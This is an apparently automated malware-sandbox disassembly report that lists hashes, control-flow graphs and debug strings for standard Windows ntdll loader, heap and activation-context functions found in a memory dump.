                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ddc31632f63abfd2c21e9ce227e45e007de5fa483d6d91520e942e2fe9b8ed50
                                                                      • Instruction ID: 910f37cd8a5e7ea8cf4e1bc6f2e816cae9113a846587679ef634d4184f8a6e73
                                                                      • Opcode Fuzzy Hash: ddc31632f63abfd2c21e9ce227e45e007de5fa483d6d91520e942e2fe9b8ed50
                                                                      • Instruction Fuzzy Hash: 8590023170600802D55071584524746100547D0301F61C416A1014614DD7658A597AA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72507e37d805c2ddb0fe6e15ceb509cf8e53fe0c369fc0d563a7263ffb8b037e
                                                                      • Instruction ID: 9593e2ef3fcb39e526d64f341f6bd8eb88904247119b2d033c219b74f9aa2664
                                                                      • Opcode Fuzzy Hash: 72507e37d805c2ddb0fe6e15ceb509cf8e53fe0c369fc0d563a7263ffb8b037e
                                                                      • Instruction Fuzzy Hash: 55900235322000020545A558071450B144557D63513A1C41AF2406550CD63188696722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1160 36bba1f0-36bba269 call 36af2330 * 2 RtlDebugPrintTimes 1166 36bba41f-36bba444 call 36af24d0 * 2 call 36b24b50 1160->1166 1167 36bba26f-36bba27a 1160->1167 1169 36bba27c-36bba289 1167->1169 1170 36bba2a4 1167->1170 1173 36bba28b-36bba28d 1169->1173 1174 36bba28f-36bba295 1169->1174 1171 36bba2a8-36bba2b4 1170->1171 1178 36bba2c1-36bba2c3 1171->1178 1173->1174 1176 36bba29b-36bba2a2 1174->1176 1177 36bba373-36bba375 1174->1177 1176->1171 1180 36bba39f-36bba3a1 1177->1180 1181 36bba2b6-36bba2bc 1178->1181 1182 36bba2c5-36bba2c7 1178->1182 1186 36bba3a7-36bba3b4 1180->1186 1187 36bba2d5-36bba2fd RtlDebugPrintTimes 1180->1187 1184 36bba2be 1181->1184 1185 36bba2cc-36bba2d0 1181->1185 1182->1180 1184->1178 1189 36bba3ec-36bba3ee 1185->1189 1190 36bba3da-36bba3e6 1186->1190 1191 36bba3b6-36bba3c3 1186->1191 1187->1166 1200 36bba303-36bba320 RtlDebugPrintTimes 1187->1200 1189->1180 1192 36bba3fb-36bba3fd 1190->1192 1194 36bba3cb-36bba3d1 1191->1194 1195 36bba3c5-36bba3c9 1191->1195 1198 36bba3ff-36bba401 1192->1198 1199 36bba3f0-36bba3f6 1192->1199 1196 36bba4eb-36bba4ed 1194->1196 1197 36bba3d7 1194->1197 1195->1194 1201 36bba403-36bba409 1196->1201 1197->1190 1198->1201 1202 36bba3f8 1199->1202 1203 36bba447-36bba44b 1199->1203 1200->1166 1208 36bba326-36bba34c RtlDebugPrintTimes 1200->1208 1205 36bba40b-36bba41d RtlDebugPrintTimes 1201->1205 1206 36bba450-36bba474 RtlDebugPrintTimes 1201->1206 1202->1192 1204 36bba51f-36bba521 1203->1204 1205->1166 1206->1166 1212 36bba476-36bba493 RtlDebugPrintTimes 1206->1212 1208->1166 1213 36bba352-36bba354 1208->1213 1212->1166 1220 36bba495-36bba4c4 RtlDebugPrintTimes 1212->1220 1214 36bba377-36bba38a 1213->1214 1215 36bba356-36bba363 1213->1215 1219 36bba397-36bba399 1214->1219 1217 36bba36b-36bba371 1215->1217 1218 36bba365-36bba369 1215->1218 1217->1177 1217->1214 1218->1217 1221 36bba39b-36bba39d 1219->1221 1222 36bba38c-36bba392 1219->1222 1220->1166 1226 36bba4ca-36bba4cc 1220->1226 1221->1180 1223 36bba3e8-36bba3ea 1222->1223 1224 36bba394 1222->1224 1223->1189 1224->1219 1227 36bba4ce-36bba4db 1226->1227 1228 36bba4f2-36bba505 1226->1228 1229 36bba4dd-36bba4e1 1227->1229 1230 36bba4e3-36bba4e9 1227->1230 1231 36bba512-36bba514 1228->1231 1229->1230 1230->1196 1230->1228 1232 36bba507-36bba50d 1231->1232 1233 36bba516 1231->1233 1234 36bba51b-36bba51d 1232->1234 1235 36bba50f 1232->1235 1233->1198 1234->1204 1235->1231
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: HEAP:
                                                                      • API String ID: 3446177414-2466845122
                                                                      • Opcode ID: eb56b655f5bcd38fadc5d45800afc6b78d195172762d57d8c987cda223e2a662
                                                                      • Instruction ID: 24d56a5f6569abd4c269e1df2aa26bef31a1942e87af9f973d1a597d3993746c
                                                                      • Opcode Fuzzy Hash: eb56b655f5bcd38fadc5d45800afc6b78d195172762d57d8c987cda223e2a662
                                                                      • Instruction Fuzzy Hash: FBA17975A14322CFDB14CE18C894A2ABBE6FB88354F154529EA45DB310EBB1EC45CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1236 36b17550-36b17571 1237 36b17573-36b1758f call 36aee580 1236->1237 1238 36b175ab-36b175b9 call 36b24b50 1236->1238 1243 36b17595-36b175a2 1237->1243 1244 36b54443 1237->1244 1245 36b175a4 1243->1245 1246 36b175ba-36b175c9 call 36b17738 1243->1246 1248 36b5444a-36b54450 1244->1248 1245->1238 1252 36b17621-36b1762a 1246->1252 1253 36b175cb-36b175e1 call 36b176ed 1246->1253 1250 36b54456-36b544c3 call 36b6ef10 call 36b28f40 RtlDebugPrintTimes BaseQueryModuleData 1248->1250 1251 36b175e7-36b175f0 call 36b17648 1248->1251 1250->1251 1270 36b544c9-36b544d1 1250->1270 1251->1252 1261 36b175f2 1251->1261 1256 36b175f8-36b17601 1252->1256 1253->1248 1253->1251 1263 36b17603-36b17612 call 36b1763b 1256->1263 1264 36b1762c-36b1762e 1256->1264 1261->1256 1265 36b17614-36b17616 1263->1265 1264->1265 1268 36b17630-36b17639 1265->1268 1269 36b17618-36b1761a 1265->1269 1268->1269 1269->1245 1272 36b1761c 1269->1272 1270->1251 1273 36b544d7-36b544de 1270->1273 1275 36b545c9-36b545db call 36b22b70 1272->1275 1273->1251 1274 36b544e4-36b544ef 1273->1274 1276 36b544f5-36b5452e call 36b6ef10 call 36b2a9c0 1274->1276 1277 36b545c4 call 36b24c68 1274->1277 1275->1245 1285 36b54546-36b54576 call 36b6ef10 1276->1285 1286 36b54530-36b54541 call 36b6ef10 1276->1286 1277->1275 1285->1251 1291 36b5457c-36b5458a call 36b2a690 1285->1291 1286->1252 1294 36b54591-36b545ae call 36b6ef10 call 36b5cc1e 1291->1294 1295 36b5458c-36b5458e 1291->1295 1294->1251 1300 36b545b4-36b545bd 1294->1300 1295->1294 1300->1291 1301 36b545bf 1300->1301 1301->1251
                                                                      Strings
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36B54460
                                                                      • ExecuteOptions, xrefs: 36B544AB
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36B5454D
                                                                      • Execute=1, xrefs: 36B5451E
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36B54530
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36B54507
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 36B54592
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: d1f0f4fa874263699250c0aa82ada1fb9f1f282cdbbf670954f4ff2f1c6f2a90
                                                                      • Instruction ID: b90a6f1626e9bf35c849c4f09818e20480c172219ace39aeab896aeef5c41d10
                                                                      • Opcode Fuzzy Hash: d1f0f4fa874263699250c0aa82ada1fb9f1f282cdbbf670954f4ff2f1c6f2a90
                                                                      • Instruction Fuzzy Hash: A251F571A00229BBEB109FA5EC99FED77A8FF08344F5004B9E605A7180EB709E55CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1682 36afa170-36afa18f 1683 36afa4ad-36afa4b4 1682->1683 1684 36afa195-36afa1b1 1682->1684 1683->1684 1685 36afa4ba-36b477c8 1683->1685 1686 36b477f3-36b477f8 1684->1686 1687 36afa1b7-36afa1c0 1684->1687 1685->1684 1692 36b477ce-36b477d3 1685->1692 1687->1686 1689 36afa1c6-36afa1cc 1687->1689 1690 36afa5da-36afa5dc 1689->1690 1691 36afa1d2-36afa1d4 1689->1691 1693 36afa1da-36afa1dd 1690->1693 1694 36afa5e2 1690->1694 1691->1686 1691->1693 1695 36afa393-36afa399 1692->1695 1693->1686 1696 36afa1e3-36afa1e6 1693->1696 1694->1696 1697 36afa1fa-36afa1fd 1696->1697 1698 36afa1e8-36afa1f1 1696->1698 1701 36afa5e7-36afa5f0 1697->1701 1702 36afa203-36afa24b 1697->1702 1699 36afa1f7 1698->1699 1700 36b477d8-36b477e2 1698->1700 1699->1697 1704 36b477e7-36b477f0 call 36b6ef10 1700->1704 1701->1702 1703 36afa5f6-36b4780c 1701->1703 1705 36afa250-36afa255 1702->1705 1703->1704 1704->1686 1708 36afa39c-36afa39f 1705->1708 1709 36afa25b-36afa263 1705->1709 1710 36afa26f-36afa27d 1708->1710 1711 36afa3a5-36afa3a8 1708->1711 1709->1710 1713 36afa265-36afa269 1709->1713 1714 36afa3ae-36afa3be 1710->1714 1717 36afa283-36afa288 1710->1717 1711->1714 1715 36b47823-36b47826 1711->1715 1713->1710 1716 36afa4bf-36afa4c8 1713->1716 1714->1715 1720 36afa3c4-36afa3cd 1714->1720 1718 36afa28c-36afa28e 1715->1718 1719 36b4782c-36b47831 1715->1719 1721 36afa4ca-36afa4cc 1716->1721 1722 36afa4e0-36afa4e3 1716->1722 1717->1718 1727 36b47833 1718->1727 1728 36afa294-36afa2ac call 36afa600 1718->1728 1723 36b47838 1719->1723 1720->1718 1721->1710 1724 36afa4d2-36afa4db 1721->1724 1725 36afa4e9-36afa4ec 1722->1725 1726 36b4780e 1722->1726 1729 36b4783a-36b4783c 1723->1729 1724->1718 1730 36b47819 1725->1730 1731 36afa4f2-36afa4f5 1725->1731 1726->1730 1727->1723 1735 36afa3d2-36afa3d9 1728->1735 1736 36afa2b2-36afa2da 1728->1736 1729->1695 1733 36b47842 1729->1733 1730->1715 1731->1721 1737 36afa2dc-36afa2de 1735->1737 1738 36afa3df-36afa3e2 1735->1738 1736->1737 1737->1729 1739 36afa2e4-36afa2eb 1737->1739 1738->1737 1740 36afa3e8-36afa3f3 1738->1740 1741 36b478ed 1739->1741 1742 36afa2f1-36afa2f4 1739->1742 1740->1705 1744 36b478f1-36b47909 call 36b6ef10 1741->1744 1743 36afa300-36afa30a 1742->1743 1743->1744 1745 36afa310-36afa32c call 36afa760 1743->1745 1744->1695 1750 36afa4f7-36afa500 1745->1750 1751 36afa332-36afa337 1745->1751 1753 36afa502-36afa50b 1750->1753 1754 36afa521-36afa523 1750->1754 1751->1695 1752 36afa339-36afa35d 1751->1752 1758 36afa360-36afa363 1752->1758 1753->1754 1755 36afa50d-36afa511 1753->1755 1756 36afa549-36afa551 1754->1756 1757 36afa525-36afa543 call 36ae4428 1754->1757 1759 36afa517-36afa51b 1755->1759 1760 36afa5a1-36afa5cb RtlDebugPrintTimes 1755->1760 1757->1695 1757->1756 1762 36afa369-36afa36c 1758->1762 1763 36afa3f8-36afa3fc 1758->1763 1759->1754 1759->1760 1760->1754 1781 36afa5d1-36afa5d5 1760->1781 1767 36b478e3 1762->1767 1768 36afa372-36afa374 1762->1768 1765 36b47847-36b4784f 1763->1765 1766 36afa402-36afa405 1763->1766 1769 36b47855-36b47859 1765->1769 1770 36afa554-36afa56a 1765->1770 1766->1770 1771 36afa40b-36afa40e 1766->1771 1767->1741 1772 36afa37a-36afa381 1768->1772 1773 36afa440-36afa459 call 36afa600 1768->1773 1769->1770 1775 36b4785f-36b47868 1769->1775 1776 36afa414-36afa42c 1770->1776 1777 36afa570-36afa579 1770->1777 1771->1762 1771->1776 1778 36afa49b-36afa4a2 1772->1778 1779 36afa387-36afa38c 1772->1779 1789 36afa45f-36afa487 1773->1789 1790 36afa57e-36afa585 1773->1790 1783 36b47892-36b47894 1775->1783 1784 36b4786a-36b4786d 1775->1784 1776->1762 1785 36afa432-36afa43b 1776->1785 1777->1768 1778->1743 1782 36afa4a8 1778->1782 1779->1695 1786 36afa38e 1779->1786 1781->1754 1782->1741 1783->1770 1788 36b4789a-36b478a3 1783->1788 1791 36b4786f-36b47879 1784->1791 1792 36b4787b-36b4787e 1784->1792 1785->1768 1786->1695 1788->1768 1793 36afa489-36afa48b 1789->1793 1790->1793 1794 36afa58b-36afa58e 1790->1794 1795 36b4788e 1791->1795 1796 36b47880-36b47889 1792->1796 1797 36b4788b 1792->1797 1793->1779 1798 36afa491-36afa493 1793->1798 1794->1793 1799 36afa594-36afa59c 1794->1799 1795->1783 1796->1788 1797->1795 1800 36afa499 1798->1800 1801 36b478a8-36b478b1 1798->1801 1799->1758 1800->1778 1801->1800 1802 36b478b7-36b478bd 1801->1802 1802->1800 1803 36b478c3-36b478cb 1802->1803 1803->1800 1804 36b478d1-36b478dc 1803->1804 1804->1803 1805 36b478de 1804->1805 1805->1800
                                                                      Strings
                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 36B477DD, 36B47802
                                                                      • SsHd, xrefs: 36AFA304
                                                                      • Actx , xrefs: 36B47819, 36B47880
                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B47807
                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B477E2
                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36B478F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                      • API String ID: 0-1988757188
                                                                      • Opcode ID: 51114384e3bd9614951587db19975918110df9748622dae363ed11c071d98984
                                                                      • Instruction ID: 48aa72945982067c19a9e960f436f7397568fb9a727f8c1c8f0bc5133610de09
                                                                      • Opcode Fuzzy Hash: 51114384e3bd9614951587db19975918110df9748622dae363ed11c071d98984
                                                                      • Instruction Fuzzy Hash: 46E1BF78A24311CFE711CE26CC8479AB7E1AB84758F504A2DFE55CF290DBB2D845CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1850 36afd690-36afd6cb 1851 36afd907-36afd90e 1850->1851 1852 36afd6d1-36afd6db 1850->1852 1851->1852 1853 36afd914-36b49139 1851->1853 1854 36b49164 1852->1854 1855 36afd6e1-36afd6ea 1852->1855 1853->1852 1861 36b4913f-36b49144 1853->1861 1858 36b4916e-36b4917d 1854->1858 1855->1854 1857 36afd6f0-36afd6f3 1855->1857 1859 36afd8fa-36afd8fc 1857->1859 1860 36afd6f9-36afd6fb 1857->1860 1864 36b49158-36b49161 call 36b6ef10 1858->1864 1862 36afd902 1859->1862 1863 36afd701-36afd704 1859->1863 1860->1854 1860->1863 1865 36afd847-36afd858 call 36b24b50 1861->1865 1866 36afd70a-36afd70d 1862->1866 1863->1854 1863->1866 1864->1854 1871 36afd919-36afd922 1866->1871 1872 36afd713-36afd716 1866->1872 1871->1872 1873 36afd928-36b49153 1871->1873 1874 36afd92d-36afd936 1872->1874 1875 36afd71c-36afd768 call 36afd580 1872->1875 1873->1864 1874->1875 1877 36afd93c 1874->1877 1875->1865 1880 36afd76e-36afd772 1875->1880 1877->1858 1880->1865 1881 36afd778-36afd77f 1880->1881 1882 36afd785-36afd789 1881->1882 1883 36afd8f1-36afd8f5 1881->1883 1885 36afd790-36afd79a 1882->1885 1884 36b49370-36b49388 call 36b6ef10 1883->1884 1884->1865 1885->1884 1886 36afd7a0-36afd7a7 1885->1886 1888 36afd80d-36afd82d 1886->1888 1889 36afd7a9-36afd7ad 1886->1889 1893 36afd830-36afd833 1888->1893 1891 36b4917f 1889->1891 1892 36afd7b3-36afd7b8 1889->1892 1895 36b49186-36b49188 1891->1895 1894 36afd7be-36afd7c5 1892->1894 1892->1895 1896 36afd85b-36afd860 1893->1896 1897 36afd835-36afd838 1893->1897 1903 36b491f7-36b491fa 1894->1903 1904 36afd7cb-36afd803 call 36b28170 1894->1904 1895->1894 1902 36b4918e-36b491b7 1895->1902 1900 36b492e0-36b492e8 1896->1900 1901 36afd866-36afd869 1896->1901 1898 36afd83e-36afd840 1897->1898 1899 36b49366-36b4936b 1897->1899 1905 36afd842 1898->1905 1906 36afd891-36afd8ac call 36afa600 1898->1906 1899->1865 1907 36b492ee-36b492f2 1900->1907 1908 36afd941-36afd94f 1900->1908 1901->1908 1909 36afd86f-36afd872 1901->1909 1902->1888 1910 36b491bd-36b491d7 call 36b38050 1902->1910 1912 36b491fe-36b4920d call 36b38050 1903->1912 1926 36afd805-36afd807 1904->1926 1905->1865 1932 36b49335-36b4933a 1906->1932 1933 36afd8b2-36afd8da 1906->1933 1907->1908 1913 36b492f8-36b49301 1907->1913 1914 36afd874-36afd884 1908->1914 1916 36afd955-36afd95e 1908->1916 1909->1897 1909->1914 1910->1926 1931 36b491dd-36b491f0 1910->1931 1927 36b49224 1912->1927 1928 36b4920f-36b4921d 1912->1928 1921 36b49303-36b49306 1913->1921 1922 36b4931f-36b49321 1913->1922 1914->1897 1923 36afd886-36afd88f 1914->1923 1916->1898 1929 36b49310-36b49313 1921->1929 1930 36b49308-36b4930e 1921->1930 1922->1908 1935 36b49327-36b49330 1922->1935 1923->1898 1926->1888 1934 36b4922d-36b49231 1926->1934 1927->1934 1928->1912 1938 36b4921f 1928->1938 1940 36b49315-36b4931a 1929->1940 1941 36b4931c 1929->1941 1930->1922 1931->1910 1942 36b491f2 1931->1942 1936 36afd8dc-36afd8de 1932->1936 1937 36b49340-36b49343 1932->1937 1933->1936 1934->1888 1939 36b49237-36b4923d 1934->1939 1935->1898 1946 36b49356-36b4935b 1936->1946 1947 36afd8e4-36afd8eb 1936->1947 1937->1936 1943 36b49349-36b49351 1937->1943 1938->1888 1944 36b49264-36b4926d 1939->1944 1945 36b4923f-36b4925c 1939->1945 1940->1935 1941->1922 1942->1888 1943->1893 1950 36b492b4-36b492b6 1944->1950 1951 36b4926f-36b49274 1944->1951 1945->1944 1949 36b4925e-36b49261 1945->1949 1946->1865 1948 36b49361 1946->1948 1947->1883 1947->1885 1948->1899 1949->1944 1952 36b492b8-36b492d3 call 36ae4428 1950->1952 1953 36b492d9-36b492db 1950->1953 1951->1950 1954 36b49276-36b4927a 1951->1954 1952->1865 1952->1953 1953->1865 1956 36b49282-36b492ae RtlDebugPrintTimes 1954->1956 1957 36b4927c-36b49280 1954->1957 1956->1950 1960 36b492b0 1956->1960 1957->1950 1957->1956 1960->1950
                                                                      APIs
                                                                      Strings
                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 36B4914E, 36B49173
                                                                      • GsHd, xrefs: 36AFD794
                                                                      • Actx , xrefs: 36B49315
                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B49178
                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36B49372
                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B49153
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                      • API String ID: 3446177414-2196497285
                                                                      • Opcode ID: 7ce46b64f87bf420ed91978fea487784d81a129c2734a6f283aad8135d0ca027
                                                                      • Instruction ID: a9bf1a28f734459c38e2315d82a20a22e47146054ff8ff6b55c405be8a42dc9d
                                                                      • Opcode Fuzzy Hash: 7ce46b64f87bf420ed91978fea487784d81a129c2734a6f283aad8135d0ca027
                                                                      • Instruction Fuzzy Hash: 92E1A074A183119FE712EF25CC80B4AB7E4BB89358F505A6DF9558F281DB32E844CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlDebugPrintTimes.NTDLL ref: 36AD651C
                                                                        • Part of subcall function 36AD6565: RtlDebugPrintTimes.NTDLL ref: 36AD6614
                                                                        • Part of subcall function 36AD6565: RtlDebugPrintTimes.NTDLL ref: 36AD665F
                                                                      Strings
                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36B397B9
                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36B3977C
                                                                      • LdrpInitShimEngine, xrefs: 36B39783, 36B39796, 36B397BF
                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36B39790
                                                                      • apphelp.dll, xrefs: 36AD6446
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B397A0, 36B397C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-204845295
                                                                      • Opcode ID: a374f13e3e9b9f0ea931b93e5de168b1f361acfab8b3c33e1627ee112961dd68
                                                                      • Instruction ID: acabc8ddf4db439111903f7f48f82e6cb8d9fe82294b058a1f4e9bb82885ad56
                                                                      • Opcode Fuzzy Hash: a374f13e3e9b9f0ea931b93e5de168b1f361acfab8b3c33e1627ee112961dd68
                                                                      • Instruction Fuzzy Hash: F151B071609300EFE310EF24CD60E5ABBE5FB84644F500919FA849B2A1EB34D945CF93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                      • API String ID: 3446177414-4227709934
                                                                      • Opcode ID: 3bab520920cc536fcbfa69efb69e3e92c611f0944ced91c29a631592b31ea633
                                                                      • Instruction ID: 9aa5f4e876868891d3b2fa254780668988a62e87a7ccd247327d357d0e148d58
                                                                      • Opcode Fuzzy Hash: 3bab520920cc536fcbfa69efb69e3e92c611f0944ced91c29a631592b31ea633
                                                                      • Instruction Fuzzy Hash: AA415DB9E01219ABDB01DF95C994ADEBBBAFF48354F110069EA04A7340D775DE01CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                      • API String ID: 3446177414-3492000579
                                                                      • Opcode ID: 87afe7dd8c80dc91f60b65653bc625fc92bcdd7bc40a3114ff1d9bcbfe0a6d1a
                                                                      • Instruction ID: 89d47b101ec4ed7ada3768f03b3ab3b9f9a0419019ddf866f953cd3bde8ba9d6
                                                                      • Opcode Fuzzy Hash: 87afe7dd8c80dc91f60b65653bc625fc92bcdd7bc40a3114ff1d9bcbfe0a6d1a
                                                                      • Instruction Fuzzy Hash: DB71E075901695EFCB01CFA8C8A0AADFBF6FF49394F048099E845AB251CB399941CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36B39885
                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36B39843
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B39854, 36B39895
                                                                      • LdrpLoadShimEngine, xrefs: 36B3984A, 36B3988B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
